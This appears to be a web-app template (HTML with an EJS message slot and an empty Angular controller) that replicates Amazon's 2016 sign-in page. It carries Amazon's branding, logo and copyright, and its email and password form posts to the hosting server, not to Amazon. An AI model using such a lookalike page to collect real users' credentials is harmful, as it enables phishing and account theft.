<!DOCTYPE >
<html xmlns=\"http://www.w3.org/1999/xhtml\" ng-app="myApp" ng-controller="signin">

    <head>
        <script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>
        <title>Amazon.com Sign In</title>
        <link  type="text/css" href="https://images-na.ssl-images-amazon.com/images/G/01/x-locale/common/errors-alerts/error-styles-ssl._CB219086192_.css" rel="stylesheet" />
        <link  type="text/css" href="https://images-na.ssl-images-amazon.com/images/G/01/authportal/common/css/ap_global._CB318885489_.css" rel="stylesheet" />
        <link  type="text/css" href="https://images-na.ssl-images-amazon.com/images/G/01/omaha/css/authPortalPages._CB327897174_.css" rel="stylesheet" />
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    </head>
    
    <script>
    var app = angular.module('myApp', []);
    app.controller('signin', function($scope,$http) {
        //
    });
    </script>
    
    <body id="amazonfresh" class="ap-locale-en_US" >
        <div id="headerbanner"></div>
         
        <div id="wrapper">
            <div id="navbarTopSlots"></div>
            <div id="topSlots">
                <div id="top-0"></div>
                <div id="top-1">
                    <div id="ap_header" class="ap_header">
                    <a href="/"><img src="https://images-na.ssl-images-amazon.com/images/G/01/omaha/images/ui/af-logo-white-trans3._CB377124652_.png" alt="Amazon.com Logo"/></a>
                    </div>
                </div>
            </div>
            <div id="centerSlots">
                <div id="center-0"></div>
                <div id="title-slot">
                    <div id="ap_title_pagelet"></div>
                </div>
                <div id="center-1"></div>
                <div id="signin-slot">
                    <form name="signIn" method="POST" id="ap_signin_form" novalidate="novalidate"
                        action="">
                        <div id="ap_signin1a_pagelet" class="ap_table ap_pagelet">
                            <div id="ap_signin1a_pagelet_title" class="ap_row ap_pagelet_title">
                                <h1>Sign In</h1>
                                <p style="color: red;"> <%=  locals.message %> </p>
                            </div>
                            <div id="ap_signin1a_email_section_title" class="ap_row ap_section_title">
                                <h2>What is your email (phone for mobile accounts)?</h2>
                            </div>
                            <div id="ap_signin1a_email_row" class="ap_row">
                                <span class="ap_col1 ap_bold ap_right ap_no_collapse">
                                    <label for="ap_email">E-mail or mobile number:</label>
                                </span>
                                <span class="ap_col2 ap_left">
                                    <input id="email" name="email" value="" type="email" size="30" maxlength="128" tabindex="1" autocorrect="off" autocapitalize="off" />
                                </span>
                            </div>
                            <div id="ap_signin_custom_message" class="center clear-both" ></div>
                            <input type="hidden" id="ap_signin_existing_radio" value="0" />
                            <div id="ap_signin1a_password_row" class="ap_row" >
                                <span class="ap_col1 ap_bold ap_right ap_no_collapse">
                                    <label for="ap_password">Password</label>
                                </span>
                                <span class="ap_col2">
                                    <input id="password" name="password" type="password" maxlength="1024" size="20"  tabindex="2" class="password"/>
                                </span>
                            </div>
                            <div id="ap_small_forgot_password_link">
                                <span class="small">
                                    <a href="#">Forgot password?</a>
                                </span>
                            </div>
                            <div id="ap_signin1a_signin_button_row" class="ap_row">
                                <span class="ap_col1">&nbsp;</span>
                                <span class="ap_col2">
                                    <span class="in-amzn-btn btn-prim-med-ra" id="signInSubmit" unselectable="on">
                                        <span>
                                            <input type="submit" id="signInSubmit-input" value="Sign In" tabindex="5" />
                                        </span>
                                    </span>
                                </span>
                            </div>
                            <div id="ap_signin1a_notification_row" class="ap_row">
                                <span id="sign_in_notification_row">
                                    New Amazon.com customer?
                                    <a href="signup">Create a new Amazon account</a>
                                </span>
                            </div>
                            <div id="ap_signin1a_forgot_password_row" class="ap_row">
                                <span class="ap_col1">&nbsp;</span>
                                <span class="ap_col2">
                                    <a href="">Forgot your password?</a>
                                </span>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
            <div id="bottomSlots">
                <div id="bottom-1">
                    <div id="ap_privacy" class="ap_privacy_footer">
                        <p class="tiny" align="center">
                            <a id="footer_conditions_of_use_URL_link" href="" onclick=""  >Conditions of Use</a>
                            <a id="footer_privacy_notice_URL_link" href=""  >Privacy Notice</a>
                            <br>
                            <span id="ap_footer_copyright">© 1996-2016, Amazon.com, Inc. or its affiliates</span>
                        </p>
                    </div>
                </div>
            </div>
        </body>
    </html>